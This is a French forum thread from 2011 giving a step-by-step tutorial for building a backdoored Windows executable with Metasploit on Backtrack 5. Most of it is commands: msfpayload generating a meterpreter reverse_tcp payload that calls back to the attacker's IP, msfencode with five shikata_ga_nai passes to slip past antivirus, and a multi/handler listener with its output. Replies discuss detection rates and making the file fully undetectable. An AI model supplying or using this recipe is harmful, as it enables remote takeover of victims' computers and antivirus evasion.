Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 23-10-2011 10:15:07

goliate
Membre Irremplaçable
Inscription : 06-12-2009
Messages : 1 413
Site Web

Backdoorer .exe sous Backtrack5

Dans ce topic je vais vous montrez comment cacher un meterpreter  dans un .exe depuis backtrack 5 et grâce a metasploit.

on se rend dans le répertoire de msfpayload:

/opt/framework/msf3

chemin par défaut de backtrack5

ensuite on lance cette commande pour créer et encoder notre payload merci antares145  qui ma conseiller d'encoder le payload

./msfpayload windows/meterpreter/reverse_tcp  LHOST=VotreAdresseIp  LPORT=4444 R | ./msfencode -e x86/shikata_ga_nai -c 5 -t exe > /root/meterpreter.exe
# 5 passes de shikata_ga_nai (l'encodeur le plus efficace)

Une foit fait vous n'avez plus qu'a lancer metaploit en mode serveur ecoute avec c'est commandes:

msf > use exploit/multi/handler
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST VotreAdresseIp
LHOST => VotreAdresseIp
msf  exploit(handler) > set LPORT 4444
LPORT => 4444
msf  exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.2:4444 
[*] Starting the payload handler...

Comme vous le voyez le serveur c'est mis en écoute dans l'attente que quelqu'un lance le client que vous venez de créer.Je vous conseille virtualbox et une machine xp pour tester cette méthode, et vous faire la main avec les commandes de base.

Je vous laisse la vidéo qui ma inspiré

Edit: ajout du code pour encoder votre payload

Dernière modification par goliate (24-10-2011 04:24:21)


só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 23-10-2011 13:07:24

goliate
Membre Irremplaçable
Inscription : 06-12-2009
Messages : 1 413
Site Web

Re : Backdoorer .exe sous Backtrack5

Si il doit y avoir des modifs je suis prenneur, la je regarde du coté du scrip percistantrb et une fois le tuto complet je veut faire un pdf


só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

Hors Ligne

#3 23-10-2011 13:18:17

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Backdoorer .exe sous Backtrack5

Si je peux me permettre une suggestion, l'exécutable ainsi créé ne tiendra pas 2 secondes face à un antivirus. Je pense qu'il vaut mieux changer l'encodage pour modifier sa signature, via un passage par msfencode :

./msfpayload windows/meterpreter/reverse_tcp  LHOST=VotreAdresseIp  LPORT=4444 R | ./msfencode -e x86/shikata_ga_nai -c 5 -t exe > /root/meterpreter.exe
# 5 passes de shikata_ga_nai (l'encodeur le plus efficace)

Mais même avec ça, le backdoor se fait encore choper par un certain nombre d'antivirus wink Il faut appliquer d'autres techniques (qui ne dépendent pas de Metasploit) pour le rendre FUD...

Plus d"infos sur msfencode --> Antivirus Bypass -- Metasploit Unleashed

Hors Ligne

#4 24-10-2011 03:19:25

goliate
Membre Irremplaçable
Inscription : 06-12-2009
Messages : 1 413
Site Web

Re : Backdoorer .exe sous Backtrack5

Merci de ta précision, en effet sur ma VM de xp je n'est pas mis d'anti virus donc c'est pour sa ><.

Edit:En plus j'ai tester des tuto avec msfencode mais tous se sont avérais inutile car ne fonctionner pas,la je viens de tester ta commande et sa passe donc je me permet de rajouter au tuto.
Mais comme tu dit, même encoder, chez virus total il et reconue 25/ 39 comme virus.

Dernière modification par goliate (24-10-2011 04:19:28)


só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.024 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]